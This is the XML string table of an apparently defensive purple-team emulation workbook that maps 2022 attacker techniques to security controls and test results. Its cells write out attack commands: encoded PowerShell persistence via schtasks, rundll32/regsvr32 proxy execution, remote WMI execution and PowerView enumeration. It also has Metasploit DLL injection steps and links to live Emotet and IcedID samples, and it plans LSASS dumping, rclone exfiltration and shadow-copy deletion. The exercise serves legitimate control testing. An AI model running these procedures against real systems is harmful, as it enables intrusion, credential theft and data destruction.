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66b5136893e0f03f/Security/Purple_Teaming/Adversary_Emulation_Plan/Top35/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="726" documentId="11_C9DA1BF296492D7F5F6F97E4D73CE5007B7F791E" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{25363B45-91AC-4BD8-B158-131E9ACAFFCA}"/>
  <bookViews>
    <workbookView xWindow="-110" yWindow="-110" windowWidth="25820" windowHeight="15500" tabRatio="500" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Purple Teaming Log and Report" sheetId="1" r:id="rId1"/>
    <sheet name="Sheet1" sheetId="2" state="hidden" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">'Purple Teaming Log and Report'!$A$27:$J$105</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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="400" uniqueCount="203">
  <si>
    <t>Purple Teaming Plan</t>
  </si>
  <si>
    <t>Version</t>
  </si>
  <si>
    <t>1.0</t>
  </si>
  <si>
    <t>Date</t>
  </si>
  <si>
    <t>TLP</t>
  </si>
  <si>
    <t>WHITE</t>
  </si>
  <si>
    <t>Team and Roles</t>
  </si>
  <si>
    <t>John - Coordinator
Alice - Red Team
Bob - Blue Team
Mario - CTI Team</t>
  </si>
  <si>
    <t>Purple Teaming Objective(s)</t>
  </si>
  <si>
    <t>This exercise is meant to:
1. Get an overview of how the organization would deal against such threats
2. Test the effectiveness of the security controls
3. Identify gaps and improvements</t>
  </si>
  <si>
    <t>Cyber Threat Intelligence overview</t>
  </si>
  <si>
    <t>Name</t>
  </si>
  <si>
    <t>Type</t>
  </si>
  <si>
    <t>Simulation - TTPs and Tools</t>
  </si>
  <si>
    <t>Overview</t>
  </si>
  <si>
    <t>Based on various public resources, this plan depicts the top TTPs and Tools leveraged by threat actors throughout 2022. No tailoring has been performed on this plan whether by geographical regions, victimology or threat types (APT, organized crime, etc.)</t>
  </si>
  <si>
    <t>Tools and malware</t>
  </si>
  <si>
    <t>Victimology</t>
  </si>
  <si>
    <t>N/A</t>
  </si>
  <si>
    <t>Attribution theory</t>
  </si>
  <si>
    <t>TTPs - ATT&amp;CK Navigator</t>
  </si>
  <si>
    <t>https://github.com/Sam0x90/CTI/blob/main/Adversary%20Emulation%20Plans/2022_Top35_Mitre/top35_navigator_layer.json</t>
  </si>
  <si>
    <t>Simulation Plan</t>
  </si>
  <si>
    <t>CTI Team</t>
  </si>
  <si>
    <t>CTI and Red Team</t>
  </si>
  <si>
    <t>Red Team</t>
  </si>
  <si>
    <t>Red &amp; Blue Team</t>
  </si>
  <si>
    <t>Blue Team</t>
  </si>
  <si>
    <t>ALL</t>
  </si>
  <si>
    <t># ID</t>
  </si>
  <si>
    <t>Tactic</t>
  </si>
  <si>
    <t>Technique/Tool</t>
  </si>
  <si>
    <t>Procedure description</t>
  </si>
  <si>
    <t>Procedure replay</t>
  </si>
  <si>
    <t>Expected Control/Mitigation</t>
  </si>
  <si>
    <t>Observation</t>
  </si>
  <si>
    <t>Effectiveness</t>
  </si>
  <si>
    <t>Comment</t>
  </si>
  <si>
    <t>TA0043 Reconnaissance</t>
  </si>
  <si>
    <t>not covered</t>
  </si>
  <si>
    <t>n/a</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>TA0042 Resource Development</t>
  </si>
  <si>
    <t>T1608.006 Stage Capabilities: SEO Poisoning</t>
  </si>
  <si>
    <t>Most software SEO-poisoned: https://github.com/Sam0x90/CTI/blob/main/ATT%26CK/Techniques/T1608_Stage_Capabilities/T1608.006_SEO_Poisoning/SEO_poisoned_software.txt</t>
  </si>
  <si>
    <t>TA0001 Initial Access</t>
  </si>
  <si>
    <t>T1566.001 Phishing: Spearphishing Attachment</t>
  </si>
  <si>
    <t>Mail gateway/antispam quarantine email</t>
  </si>
  <si>
    <t>None</t>
  </si>
  <si>
    <t>Prevention</t>
  </si>
  <si>
    <t>Expected, ineffective</t>
  </si>
  <si>
    <t>In 2022, most malwares used in phishing were Qakbot, Emotet, Formbook, IcedID, Remcos, QuadAgent.
Antivirus software on Exchange was unexpected. It said quarantined threat but email was delivers to user mailbox still.</t>
  </si>
  <si>
    <t>SIEM alert at 4.07pm</t>
  </si>
  <si>
    <t>Detection</t>
  </si>
  <si>
    <t>Expected, effective</t>
  </si>
  <si>
    <t>Unexpected control 1</t>
  </si>
  <si>
    <t>Antivirus event on Exchange server
Event triggered at 4.06pm</t>
  </si>
  <si>
    <t>Not-expected, partially effective</t>
  </si>
  <si>
    <t>Emotet Excel file as email attachment</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;Document here the expected security controls prior to executing the TTPs&gt;</t>
  </si>
  <si>
    <t>&lt;Document observation on expected/unexpected security control&gt;</t>
  </si>
  <si>
    <t>S0367 Emotet</t>
  </si>
  <si>
    <t>IcedID LNK into ISO file as email attachment</t>
  </si>
  <si>
    <t>S0483 IcedID</t>
  </si>
  <si>
    <t>Emotet OneNote file as email attachment</t>
  </si>
  <si>
    <t>T1566.002 Phishing: Spearphishing Link</t>
  </si>
  <si>
    <t>Phishing link sent by email</t>
  </si>
  <si>
    <t>TA0002 Execution</t>
  </si>
  <si>
    <t>T1204.002 User Exectution: Malicious File</t>
  </si>
  <si>
    <t>Creation of file in C:\Users\Public</t>
  </si>
  <si>
    <t>T1059.001 Powershell</t>
  </si>
  <si>
    <t>Encoded Powershell in LNK</t>
  </si>
  <si>
    <t>This LNK will run a Base64 encoded command in powershell.exe that will download a legit calc.exe from github and execute it from C:\Users\Public
Clean calc.exe in C:\Users\Public\calc.exe</t>
  </si>
  <si>
    <t>Usage of ShareFinder</t>
  </si>
  <si>
    <t>TA0007 Discovery</t>
  </si>
  <si>
    <t>T1135 Network Share Discovery</t>
  </si>
  <si>
    <t>Usage of Powerview</t>
  </si>
  <si>
    <t>T1087 Account discovery
T1135 Network Share Discovery
T1482 Domain Trust Discovery</t>
  </si>
  <si>
    <t>T1047 Windows Management Instrumentation</t>
  </si>
  <si>
    <t>WMI software enumeration</t>
  </si>
  <si>
    <t>T1518 Software Discovery</t>
  </si>
  <si>
    <t>WMI Domain enumeration</t>
  </si>
  <si>
    <t>T1082 System Information Discovery</t>
  </si>
  <si>
    <t>WMI EventConsumer running script</t>
  </si>
  <si>
    <t>TA0003 Persistence</t>
  </si>
  <si>
    <t>T1546.003 Event Triggered Execution: WMI Event Subscription</t>
  </si>
  <si>
    <t>Using T1078 Valid Account to interact with remote systems using WinRM</t>
  </si>
  <si>
    <t>TA0008 Lateral Movement</t>
  </si>
  <si>
    <t>T1021.006 Remote Services: Windows Remote Management</t>
  </si>
  <si>
    <t>T1053.005 Scheduled Task</t>
  </si>
  <si>
    <t>Creation of schedule task with execution of powershell calling encoded string from registry</t>
  </si>
  <si>
    <t>T1547.001 Registry Run Keys / Stratup Folder</t>
  </si>
  <si>
    <t>Creation of registry keys for persistence on several locations</t>
  </si>
  <si>
    <t>TA0004 Privilege Escalation</t>
  </si>
  <si>
    <t>T1055.001 Process Injection: Dynamic-link Library Injection</t>
  </si>
  <si>
    <t>TA0005 Defense Evasion</t>
  </si>
  <si>
    <t>S0154 Cobalt Strike</t>
  </si>
  <si>
    <t>T1055.012 Process Injection: Process Hollowing</t>
  </si>
  <si>
    <t>TBD</t>
  </si>
  <si>
    <t>T1218.010 System Binary Proxy Execution: Regsvr32</t>
  </si>
  <si>
    <t xml:space="preserve">Executing dll with regsvr32. </t>
  </si>
  <si>
    <t>This DLL was an open source project that no longer exists but the DLL is harmless and has been built to be loaded in various ways such as DllRegisterServer function.</t>
  </si>
  <si>
    <t>T1218.011 System Binary Proxy Execution: Rundll32</t>
  </si>
  <si>
    <t>Executing dll with rundll32. First with function name, then with cardinal number.</t>
  </si>
  <si>
    <t>Related to: https://atomicredteam.io/defense-evasion/T1218.011/
And: https://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/</t>
  </si>
  <si>
    <t>TA0006 Credential Access</t>
  </si>
  <si>
    <t>T1003.001 OS Credential Dumping: LSASS Memory</t>
  </si>
  <si>
    <t>Testing different ways of dumping lsass</t>
  </si>
  <si>
    <t>S0002 Mimikatz</t>
  </si>
  <si>
    <t>S0349 Lazagne</t>
  </si>
  <si>
    <t>T1003.003 OS Credential Dumping: NTDS</t>
  </si>
  <si>
    <t>Extract using ntdsutil or secretsdump.py</t>
  </si>
  <si>
    <t>T1110.003 Brute force: Password Spraying</t>
  </si>
  <si>
    <t>T1482 Domain Trust Discovery</t>
  </si>
  <si>
    <t>LOLBins discovery execution</t>
  </si>
  <si>
    <t>T1018 Remote System Discovery</t>
  </si>
  <si>
    <t>T1016 System Network Configuration Discovery</t>
  </si>
  <si>
    <t>T1087.002 Account Discovery: Domain Account</t>
  </si>
  <si>
    <t>Usage of ADFind</t>
  </si>
  <si>
    <t>S0552 AdFind</t>
  </si>
  <si>
    <t>T1021.001 Remote Services: Remote Desktop Protocol</t>
  </si>
  <si>
    <t>T1021.002 Remote Services: SMB/Windows Admin Shares</t>
  </si>
  <si>
    <t>T1550.002 Use Alternate Authentication Material: Pass the Hash</t>
  </si>
  <si>
    <t>TA0009 Collection</t>
  </si>
  <si>
    <t>T1560.001 Archive Collected Data: Archive via Utility</t>
  </si>
  <si>
    <t>Usage of 7z and certutil</t>
  </si>
  <si>
    <t>S0160 certutil</t>
  </si>
  <si>
    <t>TA0011 Command and Control</t>
  </si>
  <si>
    <t>T1219 Remote Access Software</t>
  </si>
  <si>
    <t>Usage of several known RAT/RMM</t>
  </si>
  <si>
    <t>T1071 Application Layer Protocol</t>
  </si>
  <si>
    <t>Usage of simulation tool flightsim to simulate different type of C2 activities on the network.</t>
  </si>
  <si>
    <t>TA0010 Exfiltration</t>
  </si>
  <si>
    <t>T1567 Exfiltration Over Web Service: Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t>Usage of rclone to transfer data to MEGA cloud</t>
  </si>
  <si>
    <t>S1040 Rclone</t>
  </si>
  <si>
    <t>TA0040 Impact</t>
  </si>
  <si>
    <t>T1490 Inhibit System Recovery</t>
  </si>
  <si>
    <t>Delete volume shadow copies on a system by using vssadmin and WMI</t>
  </si>
  <si>
    <t>Delete volume shadow copies on a system by using WMI</t>
  </si>
  <si>
    <t>Appendix</t>
  </si>
  <si>
    <t>Resources</t>
  </si>
  <si>
    <t>TLP Reminder</t>
  </si>
  <si>
    <t>https://www.cisa.gov/tlp</t>
  </si>
  <si>
    <t>Control Types</t>
  </si>
  <si>
    <t>Telemetry</t>
  </si>
  <si>
    <t>Expected, partially effective</t>
  </si>
  <si>
    <t>Remediation</t>
  </si>
  <si>
    <t>Not-expected, effective</t>
  </si>
  <si>
    <t>Permanentely delete any files created to cleanup correctly</t>
  </si>
  <si>
    <t>Using DomainPasswordSpray script</t>
  </si>
  <si>
    <t>RDP into a target machine</t>
  </si>
  <si>
    <t>While the action of RDP into a remote machine is not necessarily malicious, it's a great test to assess the visibility into this behavior.</t>
  </si>
  <si>
    <t>MITRE ATT&amp;CK
Purple Team Strategies - Packt
The DFIR Report
Trellix Threat Reports
Red Canary Intelligence Insights
Checkpoint Most Wanted Malware
https://github.com/Sam0x90/CTI/tree/main/Adversary%20Emulation%20Plans</t>
  </si>
  <si>
    <t>Requires Port 135, 445 and 49668 for DRSUAPI and also if used with the -use-vss argument</t>
  </si>
  <si>
    <t>Executing calc.exe on a remote computer with psexec and renaming it mstdc with system privileges.</t>
  </si>
  <si>
    <t>Executing a process on a remote machine using psexec</t>
  </si>
  <si>
    <t>Using dumped credentials to move laterally with Meterpreter Psexec module and/or Psexec binary</t>
  </si>
  <si>
    <t>CobaltStrike reflective injection DLL if CS available for you. Otherwise Metasploit reflective_dll_inject module can be used as an alternative</t>
  </si>
  <si>
    <t>Prerequisites</t>
  </si>
  <si>
    <t xml:space="preserve">Even though FW and/or proxy might be blocking connectivity towards outside servers. Those tools usually allow P2P (direct) communication, hence the idea to test to determine if, at least, visibility within your network is available or not. </t>
  </si>
  <si>
    <t>CAREFUL, this tool will perform DNS request and TCP SYN to actual indicators related to the malware family you selected. To get the latest IoC the tool will perform API access to alphasoc website, the developer of the tool. This tool can also generate traffic for exfiltration and tunneling which could be added in your testing plan</t>
  </si>
  <si>
    <t>SIEM detection rule</t>
  </si>
  <si>
    <t>Here is non-exhaustive list of tools and malwares used in this plan: Powerview, ShareFinder, Metasploint, Cobalt Strike, Adfind, mimikatz, Lazagne, Emotet, IcedID, Darkgate, secretsdump, 7z, AnyDesk, Splashtop, Atera, TeamViewer, rclone</t>
  </si>
  <si>
    <t>Darkgate</t>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Download sample file here: https://bazaar.abuse.ch/sample/27bb0a8c1d9f9e7eaee26a97bd01f377c1f3048b881107021f60f7804410ebe8/
2. Prepare email with attachment and a controlled mailbox for simulation (to avoid infection)
3. Send email
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
1. Delete email from mailbox</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Download sample file here: https://bazaar.abuse.ch/sample/9f8b5f5da718fafb98de9b2128cd81fd720a37de6c755b81965ead358aeb912a/
2. Prepare email with attachment and a controlled mailbox for simulation (to avoid infection)
3. Send email
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
1. Delete email from mailbox</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Download sample file here: https://bazaar.abuse.ch/sample/26ea40677a90116aeb5a0d8aba85ce66edd4669573decafac12f5ed089668216/
2. Prepare email with attachment and a controlled mailbox for simulation (to avoid infection)
3. Send email
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
1. Delete email from mailbox</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Download sample file here: https://bazaar.abuse.ch/sample/9ba1b1bf9bccdf3cdd0e07616da28acea278e70f77dce249bc821c552a846aa8/
2. Prepare email with attachment and a controlled mailbox for simulation (to avoid infection)
3. Send email
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
1. Delete email from mailbox</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Pick a phishing URL from PhishTank or ThreatFox database
2. Prepare email with link and a controlled mailbox as recipient for simulation (to avoid leaking information)
3. Send email
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
1. Delete email from mailbox</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Create PE file with extension .exe in C:\Users\Public
2. Create DLL file with extension .dll in C:\Users\Public
3. Create PE file with extension .dat in C:\Users\Public
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Cleaning procedure
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1. Delete created files</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Download test LNK here: https://github.com/Sam0x90/CTI/blob/main/Adversary%20Emulation%20Plans/2022_Top35_Mitre/atomic.lnk
2. Double click the lnk
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
1. Delete file created here: C:\Users\Public\calc.exe</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
Using Powerview, here is procedure example:
1. ```Invoke-ShareFinder -CheckShareAccess - Verbose | Out-File -Encoding ascii C:\ProgramData\shares.txt```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Cleaning procedure
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>n/a</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
Using Powerview recon script to execute several discovery commands such as:
1. ```Get-NetLocalGroup```
2. ```Get-NetLocalGroupMember```
3. ```Get-NetShare```
4. ```Get-NetDomain```
5. ```Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'}```
6. ```Get-DomainSID```
7. ```Get-DomainTrust```
8. ```Get-DomainGPO```
9. ```Get-DomainPolicy```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
n/a</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
1. Download files located at: https://github.com/Sam0x90/CTI/tree/main/Adversary%20Emulation%20Plans/2022_Top35_Mitre/S14_WMI</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
2. Copy the script "cmd_fileping.vbs" in C:\temp\folder
3. Copy and run as admin the script wmi_event_sub.ps1
4. Open a notepad.exe
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Copy and run as admin the script wmi_sub_remove.ps1 to clean up the WMI subscription.
2. Delete file "cmd_fileping.vbs" in C:\temp\folder</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. ```wmic /node:&lt;IP&gt; process call create "cmd.exe /c start C:\windows\system32\calc.exe"```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
1. Kill calc.exe process on the targeted remote host</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. ```wmic computersystem get domain```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
n/a</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. ```wmic product get name,version```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
n/a</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. ```schtasks.exe /Create /F /TN "{GUID}" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\thekey).xyz))) " /SC MINUTE /MO 30```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Cleaning procedure
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t>1. Delete schedule task</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Download benin reflective DLL for injection testing at: https://github.com/stephenfewer/ReflectiveDLLInjection/blob/master/bin/reflective_dll.x64.dll
2. Get a meterpreter session running
3. In msfconsole run the following commands:
```
use post/windows/manage/reflective_dll_inject
set PATH &lt;PATH_TO_DOWNLOADED_DLL&gt;
set PID &lt;TARGET_PID&gt;
set SESSION &lt;SESSION_ID&gt;
run
```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
1. Kill the meterpreter session and clean up related files if any (PS script, etc.)
2. Kill the injected process</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
Because regsvr32 is used to register or unregister an OLE object, the DLL needs and will execute by default an export function named DllRegisterServer.
1. Download this harmless DLL from RedCanary github: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll
2. Execute: ```regsvr32.exe /s AllTheThingsx86.dll```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t>1. Execute: ```regsvr32.exe /U /s AllTheThingsx86.dll```</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Calling export function name with arguments
```rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"```
2. Calling export function by ordinal with arguments
```rundll32 "advpack.dll,#12" "cmd.exe /c calc.exe"```
3. Calling export function by negative ordinal number with args
```rundll32 "advpack.dll,#-4294967284" "cmd.exe /c calc.exe"```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
1. Kill the calc.exe processes created</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Dump LSASS Memory using comsvcs.dll by running the following command in an elevated command prompt:
